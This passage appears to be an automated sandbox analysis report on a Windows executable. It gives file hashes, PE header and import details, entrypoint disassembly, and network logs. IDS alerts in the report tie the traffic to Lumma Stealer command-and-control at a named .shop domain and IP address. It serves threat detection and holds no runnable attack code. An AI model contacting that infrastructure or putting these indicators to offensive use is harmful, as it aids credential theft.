                                                  SSDEEP:96:e4UX7ElusHhqPxF7qPcfAQXIDcQF8c6icE1cw3CPQ+HbHg/wWGTf3hOycISWLTvw:wAluB6s078m/MjsKFPzuiFTZ24IO83
                                                  MD5:09766CAD2C8252329B0C0E6A261576E3
                                                  SHA1:D44ACD4CE846308E24626D2F15AF3138B0187745
                                                  SHA-256:4B92D03D72B18F6F94B41E9B4D913E63DCAD6EB5ABEBB2132203847739E8F3A1
                                                  SHA-512:90FC458D14D5F1A85CB468FF8728D9F7402058963E431B1EBE07D466AEE229E41D435295577C50064653444DDD1929D5222999BDBBDBF60F8528B5682A69E54D
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.4.7.6.8.0.0.4.6.7.8.6.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.4.7.6.8.0.0.8.7.4.1.0.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.7.b.b.6.1.5.-.5.d.5.0.-.4.f.8.c.-.b.0.9.2.-.f.c.d.3.9.0.f.7.c.c.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.7.b.3.c.9.f.-.4.5.f.e.-.4.8.5.0.-.b.6.2.4.-.4.f.f.3.7.c.2.1.0.1.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.7.b.9.1.j.8.v.n.J...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.c.8.-.0.0.0.1.-.0.0.1.4.-.e.1.6.a.-.9.5.7.e.a.3.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.b.e.8.2.9.7.2.0.a.9.0.b.8.d.6.0.f.b.6.e.6.a.7.8.4.4.e.9.2.3.0.0.0.0.f.f.f.f.!.0.0.0.0.3.d.1.2.e.7.b.f.8.7.c.e.0.3.f.e.4.c.5.9.c.5.1.2.7.e.2.2.5.d.f.d.3.7.b.7.a.5.3.0.!.o.7.b.9.1.j.8.v.n.J...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER17B9.tmp.dmp

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Thu Apr 25 00:00:00 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):52446
                                                  Entropy (8bit):2.8165147753445083
                                                  Encrypted:false
                                                  SSDEEP:192:3wsX4UDvycwqOcO7BKdrRZa8MwkV/iUkgomcc3E413zwKA7gDnN:glKv1y7BKbw7B/xkgzu4tzhA7gR
                                                  MD5:A81AF11FDFEAAD7BB87F6E9109731741
                                                  SHA1:FAA640E4F1A8D3446EA9E72A2973C6269DBDCE2D
                                                  SHA-256:7B6CF8032FBC0359C65F0E2DA438E0FA2BD4A6CC603897A53FBAD8C13AF27775
                                                  SHA-512:A225E97E14B458BA47C2D1570E9FF774B4F85800D2643CFAEEAD30D067F4AC34CD85B73CF91B5AA763CCEFFD1FBC997B8441F785F2353622C1A7C1E6E9586A24
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .........)f............4...............H........................1..........`.......8...........T...........x=..f...........x ..........d"..............................................................................eJ......."......GenuineIntel............T.............)f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1894.tmp.WERInternalMetadata.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8328
                                                  Entropy (8bit):3.700687069618279
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJml6W6Y9/SU9/qsKgmf7NWWpDG89b1psffnm:R6lXJk6W6Y1SU9yhgmf7NWk1Cfu
                                                  MD5:6FCE49AF3704AC1CC785D82A04014867
                                                  SHA1:0038071B439E7D05B6C90BEB60A5B7F35372C321
                                                  SHA-256:46A6DB5EBB541F357C1AFB9F1E4E7A3A440D8A17E7E9A1801004636656D5759B
                                                  SHA-512:138B77F5FF98348D89DBF56907782FA8A670E680B1C712A5939D7C3C2E25A386555367C4893BEF407F0EE741D78E13B8A15ABD150A33E5342EDD8DCB2AC8E63A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.5.6.<./.P.i.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER18B5.tmp.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4579
                                                  Entropy (8bit):4.4601599494161555
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zscuJg77aI9/EWpW8VYIYm8M4J19F1z+q8KnYdPrkd:uIjfDI7Nd7VEJbnYFrkd
                                                  MD5:B892C93A6E619EF4D62C8618317AF652
                                                  SHA1:DE149DAC8EB92F0B7AC6E9CB6168CFCC56986D20
                                                  SHA-256:556D43615A49FD9BFC3ED902838B108E0356F80F1813A42CFE618AD6C8CB3893
                                                  SHA-512:5845814C362C1CC78B5A9BC47D55856A671A5B927F3C46494E250D1A36CD97858D1B473F1D1947A564B0D8A310C82FC40F49515DBD4B8A66719292BB1182C23E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="294662" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.4654601505258285
                                                  Encrypted:false
                                                  SSDEEP:6144:cIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbB:hXD94+WlLZMM6YFHw+B
                                                  MD5:3D4D4217710C749D6E4D2323B104242F
                                                  SHA1:E931F9E41EEA0C9A81A8C3A024EDE256E0A3D70B
                                                  SHA-256:004F9FDF8727A998FEF89CA68D4D01E2830963B106066925A8630BF30EDC3738
                                                  SHA-512:88C984B4AAE0DC3E65D2780CBF712C472C13D5068AC46364DCB916A577155AAF2458379C139882F7D1E870E5F622837CDF10DC81A6EF220B716631EF20045427
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..B...................................................................................................................................................................................................................................................................................................................................................T.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.142245208908651
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:o7b91j8vnJ.exe
                                                  File size:360'960 bytes
                                                  MD5:7b3e62bcbeed62a180220669f6a0c548
                                                  SHA1:3d12e7bf87ce03fe4c59c5127e225dfd37b7a530
                                                  SHA256:32cad0a627c9f3bf1172d0fc11a5492b2ff20e3e5509f53e0ac83e87d15f2a5d
                                                  SHA512:fe3456aecbfa5609623e616eaaaa8eec07b69ab5447f91358afa274e5c197e4e6784dce97822e7d4f3d5e695902fc25ceebb83d988da0afe552597d8821fce7f
                                                  SSDEEP:6144:NFWphCWXvIcpTGjr9wOgl3Oi3uBa0RwR9ZW2GCEdEL4tRDs:vWphFfANFgl3Pt0+R91cdELuRDs
                                                  TLSH:0974F01972D1C0B1E473DA361979ABA1062FFCB299718E57334C364E0D315D0AB3ABA7
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.................O.......p.v.....q.$...............e....su.......K......sN.....Rich....................PE..L...?U.c...........

                                                  File Icon

                                                  Icon Hash:4b255149654d410d

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x40416c
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x63B0553F [Sat Dec 31 15:29:03 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:7dd08063ba15d7295e29dcfabb5e9889

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007FF264D41EDFh
                                                  jmp 00007FF264D3CAE5h
                                                  push 00000014h
                                                  push 00417038h
                                                  call 00007FF264D3EF43h
                                                  call 00007FF264D420B0h
                                                  movzx esi, ax
                                                  push 00000002h
                                                  call 00007FF264D41E72h
                                                  pop ecx
                                                  mov eax, 00005A4Dh
                                                  cmp word ptr [00400000h], ax
                                                  je 00007FF264D3CAE6h
                                                  xor ebx, ebx
                                                  jmp 00007FF264D3CB15h
                                                  mov eax, dword ptr [0040003Ch]
                                                  cmp dword ptr [eax+00400000h], 00004550h
                                                  jne 00007FF264D3CACDh
                                                  mov ecx, 0000010Bh
                                                  cmp word ptr [eax+00400018h], cx
                                                  jne 00007FF264D3CABFh
                                                  xor ebx, ebx
                                                  cmp dword ptr [eax+00400074h], 0Eh
                                                  jbe 00007FF264D3CAEBh
                                                  cmp dword ptr [eax+004000E8h], ebx
                                                  setne bl
                                                  mov dword ptr [ebp-1Ch], ebx
                                                  call 00007FF264D3E178h
                                                  test eax, eax
                                                  jne 00007FF264D3CAEAh
                                                  push 0000001Ch
                                                  call 00007FF264D3CBC1h
                                                  pop ecx
                                                  call 00007FF264D41A70h
                                                  test eax, eax
                                                  jne 00007FF264D3CAEAh
                                                  push 00000010h
                                                  call 00007FF264D3CBB0h
                                                  pop ecx
                                                  call 00007FF264D41EEBh
                                                  and dword ptr [ebp-04h], 00000000h
                                                  call 00007FF264D3FF84h
                                                  test eax, eax
                                                  jns 00007FF264D3CAEAh
                                                  push 0000001Bh
                                                  call 00007FF264D3CB96h
                                                  pop ecx
                                                  call dword ptr [004110B0h]
                                                  mov dword ptr [04037EC4h], eax
                                                  call 00007FF264D41F06h
                                                  mov dword ptr [0044A42Ch], eax
                                                  call 00007FF264D41AC3h
                                                  test eax, eax
                                                  jns 00007FF264D3CAEAh

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD5 build 40629

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x174440x28.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c380000xd7b8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c460000x1360.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x111f00x38.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x169680x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x110000x17c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000xfd950xfe00365546d68981e366f6b9cf5485563051False0.6054995078740157data6.708569599816657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x110000x6cd60x6e0026624ee46364d168c3e5277e233a1467False0.389453125data4.7388444549239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x180000x3c1fec80x326005ed17408e1eeab96febd5e93f53c97e6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x3c380000xd7b80xd800902e0d7792120bfbda96c4d0c7972c65False0.5134186921296297data5.461355913258432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x3c460000x13600x1400a0c45b25d29a60da6243876bf6dbab61False0.76640625data6.489757211193242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  AFX_DIALOG_LAYOUT0x3c44e380xedata1.5714285714285714
                                                  RT_ICON0x3c384a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.5660980810234542
                                                  RT_ICON0x3c393480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5505415162454874
                                                  RT_ICON0x3c39bf00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6192196531791907
                                                  RT_ICON0x3c3a1580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.462448132780083
                                                  RT_ICON0x3c3c7000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4861632270168856
                                                  RT_ICON0x3c3d7a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.4971311475409836
                                                  RT_ICON0x3c3e1300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.4530141843971631
                                                  RT_ICON0x3c3e6000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.42217484008528783
                                                  RT_ICON0x3c3f4a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.47879061371841153
                                                  RT_ICON0x3c3fd500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5806451612903226
                                                  RT_ICON0x3c404180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.48627167630057805
                                                  RT_ICON0x3c409800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.46939834024896265
                                                  RT_ICON0x3c42f280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4842870544090056
                                                  RT_ICON0x3c43fd00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.5016393442622951
                                                  RT_ICON0x3c449580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.5531914893617021
                                                  RT_STRING0x3c450800x49adataRomanianRomania0.45161290322580644
                                                  RT_STRING0x3c455200x292dataRomanianRomania0.49240121580547114
                                                  RT_GROUP_ICON0x3c3e5980x68dataRomanianRomania0.6923076923076923
                                                  RT_GROUP_ICON0x3c44dc00x76dataRomanianRomania0.6779661016949152
                                                  RT_VERSION0x3c44e480x238data0.5299295774647887

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllGetSystemDefaultLangID, GlobalMemoryStatus, GetLocaleInfoA, FindResourceExW, LocalCompact, InterlockedDecrement, GetComputerNameW, CreateHardLinkA, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, GetUserDefaultLangID, SetCommState, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, GetExitCodeThread, AddAtomW, GlobalFindAtomW, GetOEMCP, LoadLibraryExA, VirtualProtect, SetCalendarInfoA, GetConsoleProcessList, GetTempPathA, GetVolumeInformationW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, GetStringTypeW, CreateFileW

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  RomanianRomania

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  04/25/24-01:59:52.426039UDP2052229ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop)5670053192.168.2.41.1.1.1
                                                  04/25/24-01:59:52.576860TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49730443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:56.147948TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49734443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:57.117668TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49735443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:53.349065TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49731443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:59.483318TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49737443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:54.263019TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49732443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:58.166541TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49736443192.168.2.4172.67.163.209
                                                  04/25/24-01:59:55.123309TCP2052230ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)49733443192.168.2.4172.67.163.209

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 25, 2024 01:59:52.572989941 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.573046923 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:52.573153973 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.576859951 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.576878071 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:52.816279888 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:52.816553116 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.819520950 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.819533110 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:52.819885015 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:52.860140085 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.900993109 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.901043892 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:52.901201963 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.340559959 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.340780973 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.340861082 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.343178034 CEST49730443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.343203068 CEST44349730172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.348597050 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.348692894 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.348786116 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.349065065 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.349100113 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.581455946 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.581588030 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.652034044 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.652128935 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.652484894 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:53.653745890 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.653791904 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:53.653857946 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118079901 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118146896 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118191957 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118232012 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118246078 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.118282080 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118299961 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.118324995 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118361950 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.118369102 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118490934 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118527889 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.118535042 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118578911 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.118613005 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.118618965 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.119164944 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.119200945 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.119208097 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.119277954 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.119318008 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.119379044 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.119395971 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.119410038 CEST49731443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.119415998 CEST44349731172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.262543917 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.262598991 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.262675047 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.263019085 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.263034105 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.489768982 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.489856005 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.491581917 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.491614103 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.491851091 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.493168116 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.493335009 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.493380070 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.493453026 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.493467093 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.020482063 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.020596027 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.020656109 CEST49732443192.168.2.4172.67.163.209
